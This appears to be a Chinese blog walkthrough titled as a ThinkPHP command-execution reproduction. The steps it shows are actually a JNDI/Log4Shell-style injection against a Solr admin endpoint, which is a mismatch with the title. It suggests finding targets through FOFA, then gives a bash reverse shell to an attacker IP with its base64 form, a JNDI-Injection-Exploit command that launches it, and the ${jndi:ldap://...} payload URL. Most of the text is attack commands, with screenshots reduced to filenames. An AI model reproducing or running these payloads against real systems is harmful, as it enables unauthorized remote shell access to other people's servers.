thinkphp之命令执行漏洞复现

avatar
作者
筋斗云
阅读量:0

实战:

fofa搜索thinkphp--

第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果

 

491f8115d0a117f057b0c64371d55fdf.png

 

4fbd04803681a3aa4a9f8affb3372fd4.png

返回dnslog查看到了Java的版本信息

 

125111dfdd47d12025e5a64204a2638c.png

打开kali监听端口

 

26b906f58698724f2e13893afa9fde2d.png

进行base64编码

bash -i >& /dev/tcp/192.168.189.150/8080 0>&1

我编码后的是

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx 

1151889eaa918292a9f3aa94ceceb5b0.png

复制语句、

# 命令模板 java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl #我的命令语句是 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx}|{base64,-d}|bash" -A 192.168.189.150 ​ 

bd271b1714b5901586ba905a7582c18f.png

访问一下kali里面得到的1.8版本的ldmp:/solr/admin/cores?action=${jndi:ldap://192.168.189.150:1389/jj9zyn }

kali里面就可以监听的到了

 

    广告一刻

    为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!